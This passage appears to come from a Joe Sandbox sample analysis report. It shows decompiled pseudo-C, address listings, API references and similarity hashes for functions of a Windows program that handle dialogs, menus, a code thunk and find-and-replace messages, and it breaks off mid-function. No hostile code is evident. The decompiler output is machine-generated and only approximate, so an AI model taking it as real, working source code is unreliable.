                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalCurrentHeapProcessSection$AllocCacheCreateEnterErrorExceptionFlushInstructionLastLeaveRaiseThreadWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3956295412-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7398ec43cfc6769876e79e0064b91e3a341ab95b50bb408ca123731b2c91716d
                                                                                                                                                                                                                                                                                          • Instruction ID: 844169e300e94751117d848002d34bffcda7a10fc9865ec2a528dbf6e47ba8de
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7398ec43cfc6769876e79e0064b91e3a341ab95b50bb408ca123731b2c91716d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B31A131A00305AFD7169F65ED08BAA77B8FF48720F058219F959DB690C7B0ED80CBA1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                                                                                                                          			E000FCC10(intOrPtr __edi, void* __esi, struct HWND__* _a4) {
                                                                                                                                                                                                                                                                                          				char _v4;
                                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                                          				char _v280;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v284;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                                                                                                          				signed int _t24;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t29;
                                                                                                                                                                                                                                                                                          				signed int _t41;
                                                                                                                                                                                                                                                                                          				signed int _t45;
                                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                                          				int _t49;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t50;
                                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                                          				intOrPtr _t60;
                                                                                                                                                                                                                                                                                          				char _t61;
                                                                                                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                                                                                                          				void* _t63;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t65;
                                                                                                                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                                                                                                                          				char* _t71;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t60 = __edi;
                                                                                                                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                                                                                                                          				if( *(__edi + 0x14) != 0) {
                                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                                          					_t3 = _t60 + 0x14; // 0xf7940
                                                                                                                                                                                                                                                                                          					_t21 =  *_t3;
                                                                                                                                                                                                                                                                                          					 *_t21 = 0x42444c7;
                                                                                                                                                                                                                                                                                          					 *(_t21 + 4) = 0;
                                                                                                                                                                                                                                                                                          					 *((char*)(_t21 + 8)) = 0xe9;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t21 + 9)) = 0xfffffff3 - _t21;
                                                                                                                                                                                                                                                                                          					FlushInstructionCache(GetCurrentProcess(), _t21, 0xd);
                                                                                                                                                                                                                                                                                          					_t7 = _t60 + 8; // 0x112e04
                                                                                                                                                                                                                                                                                          					_t65 = _t7;
                                                                                                                                                                                                                                                                                          					if(_t65 == 0 || _t60 == 0) {
                                                                                                                                                                                                                                                                                          						RaiseException(0xc0000005, 1, 0, 0);
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						_t69 = _t70;
                                                                                                                                                                                                                                                                                          						_t71 = _t70 - 0x114;
                                                                                                                                                                                                                                                                                          						_t24 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          						_v20 = _t24 ^ _t70;
                                                                                                                                                                                                                                                                                          						_t49 =  *0x170bb8; // 0x80
                                                                                                                                                                                                                                                                                          						_push(_t60);
                                                                                                                                                                                                                                                                                          						_v280 = 0;
                                                                                                                                                                                                                                                                                          						LoadStringA( *0x170c0c, _t49,  &_v280, 0x100);
                                                                                                                                                                                                                                                                                          						_t50 =  *0x170c0c;
                                                                                                                                                                                                                                                                                          						_t29 = LoadMenuA(_t50,  *0x170bb8 & 0x0000ffff);
                                                                                                                                                                                                                                                                                          						_t61 = _v4;
                                                                                                                                                                                                                                                                                          						_t15 = _t65 + 0x20; // 0x112e24
                                                                                                                                                                                                                                                                                          						_v284 = _t29;
                                                                                                                                                                                                                                                                                          						_t45 = E000F4F00(0x170b68, _t15) & 0x0000ffff;
                                                                                                                                                                                                                                                                                          						if(_t61 == 0) {
                                                                                                                                                                                                                                                                                          							_t61 = 0x15ad10;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_push(_t50);
                                                                                                                                                                                                                                                                                          						_t51 = _v280;
                                                                                                                                                                                                                                                                                          						_t58 =  &_v276;
                                                                                                                                                                                                                                                                                          						 *_t71 = _v280;
                                                                                                                                                                                                                                                                                          						 *_t71 = _t61;
                                                                                                                                                                                                                                                                                          						_t62 = E000FFF90(_t65, _t45, _v280, _t51,  &_v276, 0x6cf0000, 0x40100);
                                                                                                                                                                                                                                                                                          						if(_t62 != 0) {
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t65 + 0x30)) = LoadAcceleratorsA( *0x170c0c,  *0x170bb8 & 0x0000ffff);
                                                                                                                                                                                                                                                                                          							_t34 = _t62;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_pop(_t63);
                                                                                                                                                                                                                                                                                          						_pop(_t46);
                                                                                                                                                                                                                                                                                          						return E001059E6(_t34, _t46, _v16 ^ _t69, _t58, _t63, _t65);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						 *_t65 = _t60;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t65 + 4)) = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          						EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          						_t59 =  *0x170c80; // 0x0
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t65 + 8)) = _t59;
                                                                                                                                                                                                                                                                                          						 *0x170c80 = _t65;
                                                                                                                                                                                                                                                                                          						LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          						return DialogBoxParamA( *0x170c0c, 0x68, _a4, E00103D40, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t41 = E001057B1();
                                                                                                                                                                                                                                                                                          					 *(__edi + 0x14) = _t41;
                                                                                                                                                                                                                                                                                          					if(_t41 == 0) {
                                                                                                                                                                                                                                                                                          						SetLastError(0xe);
                                                                                                                                                                                                                                                                                          						return _t41 | 0xffffffff;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						goto L2;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}


























                                                                                                                                                                                                                                                                                          0x000fcc10
                                                                                                                                                                                                                                                                                          0x000fcc17
                                                                                                                                                                                                                                                                                          0x000fcc18
                                                                                                                                                                                                                                                                                          0x000fcc2a
                                                                                                                                                                                                                                                                                          0x000fcc2a
                                                                                                                                                                                                                                                                                          0x000fcc2a
                                                                                                                                                                                                                                                                                          0x000fcc37
                                                                                                                                                                                                                                                                                          0x000fcc3d
                                                                                                                                                                                                                                                                                          0x000fcc44
                                                                                                                                                                                                                                                                                          0x000fcc48
                                                                                                                                                                                                                                                                                          0x000fcc52
                                                                                                                                                                                                                                                                                          0x000fcc58
                                                                                                                                                                                                                                                                                          0x000fcc58
                                                                                                                                                                                                                                                                                          0x000fcc5d
                                                                                                                                                                                                                                                                                          0x000fcccd
                                                                                                                                                                                                                                                                                          0x000fccd3
                                                                                                                                                                                                                                                                                          0x000fccd4
                                                                                                                                                                                                                                                                                          0x000fccd5
                                                                                                                                                                                                                                                                                          0x000fccd6
                                                                                                                                                                                                                                                                                          0x000fccd7
                                                                                                                                                                                                                                                                                          0x000fccd8
                                                                                                                                                                                                                                                                                          0x000fccd9
                                                                                                                                                                                                                                                                                          0x000fccda
                                                                                                                                                                                                                                                                                          0x000fccdb
                                                                                                                                                                                                                                                                                          0x000fccdc
                                                                                                                                                                                                                                                                                          0x000fccdd
                                                                                                                                                                                                                                                                                          0x000fccde
                                                                                                                                                                                                                                                                                          0x000fccdf
                                                                                                                                                                                                                                                                                          0x000fcce1
                                                                                                                                                                                                                                                                                          0x000fcce3
                                                                                                                                                                                                                                                                                          0x000fcce9
                                                                                                                                                                                                                                                                                          0x000fccf0
                                                                                                                                                                                                                                                                                          0x000fccf3
                                                                                                                                                                                                                                                                                          0x000fcd00
                                                                                                                                                                                                                                                                                          0x000fcd0f
                                                                                                                                                                                                                                                                                          0x000fcd16
                                                                                                                                                                                                                                                                                          0x000fcd23
                                                                                                                                                                                                                                                                                          0x000fcd2b
                                                                                                                                                                                                                                                                                          0x000fcd31
                                                                                                                                                                                                                                                                                          0x000fcd34
                                                                                                                                                                                                                                                                                          0x000fcd3d
                                                                                                                                                                                                                                                                                          0x000fcd48
                                                                                                                                                                                                                                                                                          0x000fcd4d
                                                                                                                                                                                                                                                                                          0x000fcd4f
                                                                                                                                                                                                                                                                                          0x000fcd4f
                                                                                                                                                                                                                                                                                          0x000fcd54
                                                                                                                                                                                                                                                                                          0x000fcd55
                                                                                                                                                                                                                                                                                          0x000fcd67
                                                                                                                                                                                                                                                                                          0x000fcd6e
                                                                                                                                                                                                                                                                                          0x000fcd73
                                                                                                                                                                                                                                                                                          0x000fcd7c
                                                                                                                                                                                                                                                                                          0x000fcd80
                                                                                                                                                                                                                                                                                          0x000fcd97
                                                                                                                                                                                                                                                                                          0x000fcd9a
                                                                                                                                                                                                                                                                                          0x000fcd9a
                                                                                                                                                                                                                                                                                          0x000fcd9f
                                                                                                                                                                                                                                                                                          0x000fcda2
                                                                                                                                                                                                                                                                                          0x000fcdab
                                                                                                                                                                                                                                                                                          0x000fcc63
                                                                                                                                                                                                                                                                                          0x000fcc63
                                                                                                                                                                                                                                                                                          0x000fcc70
                                                                                                                                                                                                                                                                                          0x000fcc73
                                                                                                                                                                                                                                                                                          0x000fcc79
                                                                                                                                                                                                                                                                                          0x000fcc7f
                                                                                                                                                                                                                                                                                          0x000fcc87
                                                                                                                                                                                                                                                                                          0x000fcc8d
                                                                                                                                                                                                                                                                                          0x000fccaf
                                                                                                                                                                                                                                                                                          0x000fccaf
                                                                                                                                                                                                                                                                                          0x000fcc1a
                                                                                                                                                                                                                                                                                          0x000fcc1a
                                                                                                                                                                                                                                                                                          0x000fcc1f
                                                                                                                                                                                                                                                                                          0x000fcc24
                                                                                                                                                                                                                                                                                          0x000fccb4
                                                                                                                                                                                                                                                                                          0x000fccbf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fcc24

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(000F7940,0000000D,00000000,?,000F89BE,00000000), ref: 000FCC4B
                                                                                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,000F89BE,00000000), ref: 000FCC52
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 000FCC65
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68,?,000F89BE,00000000), ref: 000FCC73
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68,?,000F89BE,00000000), ref: 000FCC8D
                                                                                                                                                                                                                                                                                          • DialogBoxParamA.USER32 ref: 000FCCA7
                                                                                                                                                                                                                                                                                            • Part of subcall function 001057B1: GetProcessHeap.KERNEL32(00000000,0000000D,00000000,00000000,00104307), ref: 00105735
                                                                                                                                                                                                                                                                                            • Part of subcall function 001057B1: HeapAlloc.KERNEL32(00000000), ref: 0010573C
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E,00000000,?,000F89BE,00000000), ref: 000FCCB4
                                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000,?,000F89BE,00000000), ref: 000FCCCD
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalCurrentHeapProcessSection$AllocCacheDialogEnterErrorExceptionFlushInstructionLastLeaveParamRaiseThread
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3691675481-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 1075157b575a9ec2f6165f95367b6d286cf8de9a7af68a09b6632052fdb6d1ff
                                                                                                                                                                                                                                                                                          • Instruction ID: dda0727e7797ca47c6e57bb5913b8cb3fd90ad0d4a3d9a97f630f53538b32908
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1075157b575a9ec2f6165f95367b6d286cf8de9a7af68a09b6632052fdb6d1ff
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87117271640705EBE3269F64EE49B6577B4BB48721F108609F6599BAE0CBB0E4C0CB90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 54%
                                                                                                                                                                                                                                                                                          			E00103C60(intOrPtr* _a4, signed int _a8) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _t11;
                                                                                                                                                                                                                                                                                          				signed int _t14;
                                                                                                                                                                                                                                                                                          				intOrPtr _t21;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t26;
                                                                                                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F3A9);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t11 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_push(_t11 ^ _t28);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t14 = _a8;
                                                                                                                                                                                                                                                                                          				_t26 = _a4;
                                                                                                                                                                                                                                                                                          				_a8 = 0;
                                                                                                                                                                                                                                                                                          				_t21 =  *0x15ad30; // 0x15ad2c
                                                                                                                                                                                                                                                                                          				 *_t26 = _t21;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_a8 = 1;
                                                                                                                                                                                                                                                                                          				if(_t14 <= 3) {
                                                                                                                                                                                                                                                                                          					switch( *((intOrPtr*)(_t14 * 4 +  &M00103D10))) {
                                                                                                                                                                                                                                                                                          						case 0:
                                                                                                                                                                                                                                                                                          							_t16 = lstrlenA("Replaced %d occurances of \"%s\" with \"%s\"");
                                                                                                                                                                                                                                                                                          							_push("Replaced %d occurances of \"%s\" with \"%s\"");
                                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                                          						case 1:
                                                                                                                                                                                                                                                                                          							lstrlenA("Replace All");
                                                                                                                                                                                                                                                                                          							_push("Replace All");
                                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                                          						case 2:
                                                                                                                                                                                                                                                                                          							lstrlenA("Unable to find the text \"%s\"");
                                                                                                                                                                                                                                                                                          							_push("Unable to find the text \"%s\"");
                                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                                          						case 3:
                                                                                                                                                                                                                                                                                          							lstrlenA("Text not found");
                                                                                                                                                                                                                                                                                          							_push("Text not found");
                                                                                                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                                                                                                          							E000F5F10(_t16, _t26);
                                                                                                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L7:
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				return _t26;
                                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                                          0x00103c63
                                                                                                                                                                                                                                                                                          0x00103c65
                                                                                                                                                                                                                                                                                          0x00103c70
                                                                                                                                                                                                                                                                                          0x00103c73
                                                                                                                                                                                                                                                                                          0x00103c7a
                                                                                                                                                                                                                                                                                          0x00103c7e
                                                                                                                                                                                                                                                                                          0x00103c84
                                                                                                                                                                                                                                                                                          0x00103c87
                                                                                                                                                                                                                                                                                          0x00103c8c
                                                                                                                                                                                                                                                                                          0x00103c8f
                                                                                                                                                                                                                                                                                          0x00103c95
                                                                                                                                                                                                                                                                                          0x00103c97
                                                                                                                                                                                                                                                                                          0x00103c9a
                                                                                                                                                                                                                                                                                          0x00103ca4
                                                                                                                                                                                                                                                                                          0x00103ca6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00103cb2
                                                                                                                                                                                                                                                                                          0x00103cb8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00103cc4
                                                                                                                                                                                                                                                                                          0x00103cca
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00103cd6
                                                                                                                                                                                                                                                                                          0x00103cdc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00103ce8
                                                                                                                                                                                                                                                                                          0x00103cee
                                                                                                                                                                                                                                                                                          0x00103cf3
                                                                                                                                                                                                                                                                                          0x00103cf5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00103ca6
                                                                                                                                                                                                                                                                                          0x00103cfa
                                                                                                                                                                                                                                                                                          0x00103cff
                                                                                                                                                                                                                                                                                          0x00103d0c

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Replaced %d occurances of "%s" with "%s",1F9A9BDF,00000000,00000024,-00000024,0010F3A9,000000FF,?,00103850,-00000024,00000002,1F9A9BDF), ref: 00103CB2
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Replace All,?,?), ref: 00103CC4
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Unable to find the text "%s"), ref: 00103CD6
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Text not found,Unable to find the text "%s"), ref: 00103CE8
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                                                                                                                          • String ID: Replace All$Replaced %d occurances of "%s" with "%s"$Text not found$Unable to find the text "%s"
                                                                                                                                                                                                                                                                                          • API String ID: 1659193697-473213566
                                                                                                                                                                                                                                                                                          • Opcode ID: 2f97c0db8191753a335ad8b106fcc72f3c7f9a91038294b58c80c8957638abdb
                                                                                                                                                                                                                                                                                          • Instruction ID: f6be491fe98fd59dc080f3328a789f8e02a9ba969e28b7b748dfbb98ed8544ee
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f97c0db8191753a335ad8b106fcc72f3c7f9a91038294b58c80c8957638abdb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB11C231644248EFC7088F84ED06BDDB7A8FB08B60F10812BF916D7680D7F446D08B81
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                          			E000FB170(signed int* __ebx, CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                                          				CHAR* _v280;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t38;
                                                                                                                                                                                                                                                                                          				int _t43;
                                                                                                                                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                                                                                                                                          				CHAR* _t48;
                                                                                                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                                                                                                          				CHAR* _t52;
                                                                                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                                                                                                          				CHAR* _t63;
                                                                                                                                                                                                                                                                                          				signed int* _t64;
                                                                                                                                                                                                                                                                                          				signed int _t78;
                                                                                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                                                                                          				CHAR* _t88;
                                                                                                                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t78 = __edx;
                                                                                                                                                                                                                                                                                          				_t64 = __ebx;
                                                                                                                                                                                                                                                                                          				_t38 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t38 ^ _t97;
                                                                                                                                                                                                                                                                                          				_t88 = __ecx;
                                                                                                                                                                                                                                                                                          				_v280 = __ecx;
                                                                                                                                                                                                                                                                                          				if(__ecx == 0) {
                                                                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                                                                          					return E001059E6(0, _t64, _v8 ^ _t97, _t78, _t83, _t88);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t83 = lstrlenA;
                                                                                                                                                                                                                                                                                          					if(lstrlenA(__ecx) <= 0x103) {
                                                                                                                                                                                                                                                                                          						_t43 = lstrlenA(_t88);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t43 = 0x103;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(lstrcpynA( &_v276, _t88, _t43 + 1) != 0) {
                                                                                                                                                                                                                                                                                          						_t89 = 0;
                                                                                                                                                                                                                                                                                          						__eflags = _t64[1];
                                                                                                                                                                                                                                                                                          						if(_t64[1] <= 0) {
                                                                                                                                                                                                                                                                                          							L12:
                                                                                                                                                                                                                                                                                          							_t47 = _t64[1];
                                                                                                                                                                                                                                                                                          							__eflags = _t47 - _t64[3];
                                                                                                                                                                                                                                                                                          							if(_t47 != _t64[3]) {
                                                                                                                                                                                                                                                                                          								goto L25;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _t47;
                                                                                                                                                                                                                                                                                          								if(_t47 <= 0) {
                                                                                                                                                                                                                                                                                          									goto L25;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									__eflags = _t47 == 1;
                                                                                                                                                                                                                                                                                          									if(_t47 == 1) {
                                                                                                                                                                                                                                                                                          										goto L24;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t78 =  *_t64;
                                                                                                                                                                                                                                                                                          										_t72 = (_t47 - 1) * 0x104;
                                                                                                                                                                                                                                                                                          										_t89 = _t78 + 0x104;
                                                                                                                                                                                                                                                                                          										_t54 = E00105B58(_t78, _t47 * 0x104, _t78 + 0x104, (_t47 - 1) * 0x104);
                                                                                                                                                                                                                                                                                          										_t98 = _t98 + 0x10;
                                                                                                                                                                                                                                                                                          										__eflags = _t54 - 0x50;
                                                                                                                                                                                                                                                                                          										if(_t54 > 0x50) {
                                                                                                                                                                                                                                                                                          											goto L28;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t14 = _t54 + 0xfb388; // 0x3030300
                                                                                                                                                                                                                                                                                          											switch( *((intOrPtr*)(( *_t14 & 0x000000ff) * 4 +  &M000FB378))) {
                                                                                                                                                                                                                                                                                          												case 0:
                                                                                                                                                                                                                                                                                          													goto L24;
                                                                                                                                                                                                                                                                                          												case 1:
                                                                                                                                                                                                                                                                                          													goto L22;
                                                                                                                                                                                                                                                                                          												case 2:
                                                                                                                                                                                                                                                                                          													goto L23;
                                                                                                                                                                                                                                                                                          												case 3:
                                                                                                                                                                                                                                                                                          													goto L28;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t83 = 0;
                                                                                                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                                          								__eflags = _t89;
                                                                                                                                                                                                                                                                                          								if(_t89 < 0) {
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags = _t89 - _t64[1];
                                                                                                                                                                                                                                                                                          								if(_t89 >= _t64[1]) {
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t63 = lstrcmpiA( *_t64 + _t83, _v280);
                                                                                                                                                                                                                                                                                          									__eflags = _t63;
                                                                                                                                                                                                                                                                                          									if(_t63 == 0) {
